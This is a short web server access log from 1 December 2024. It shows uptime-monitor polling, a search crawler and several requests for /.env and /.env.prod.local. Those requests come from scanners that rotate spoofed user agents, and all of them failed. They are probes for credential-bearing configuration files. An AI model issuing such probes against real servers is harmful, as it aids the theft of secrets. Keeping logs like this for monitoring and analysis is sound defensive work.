179.43.163.250 - - [01/Dec/2024:08:43:50 +0100] "GET /.env.prod.local HTTP/1.1" 404 320 "-" "l9explore/1.2.2"
212.91.246.72 - - [01/Dec/2024:08:43:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:08:44:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.120.113.56 - - [01/Dec/2024:08:45:31 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
212.91.246.72 - - [01/Dec/2024:08:45:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.120.113.56 - - [01/Dec/2024:08:46:19 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53"
87.120.113.56 - - [01/Dec/2024:08:46:25 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0"
212.91.246.72 - - [01/Dec/2024:08:46:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.120.113.56 - - [01/Dec/2024:08:46:59 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
125.228.91.168 - - [01/Dec/2024:08:47:32 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
87.120.113.56 - - [01/Dec/2024:08:47:34 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; Android 8.0.0; LLD-L31) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.90 Mobile Safari/537.36"
212.91.246.72 - - [01/Dec/2024:08:47:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.35 - - [01/Dec/2024:08:48:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
46.19.138.234 - - [01/Dec/2024:08:48:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
66.249.66.88 - - [01/Dec/2024:08:48:33 +0100] "GET /www2.prokommunal.com/log/2012/09/ HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.91.246.72 - - [01/Dec/2024:08:48:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
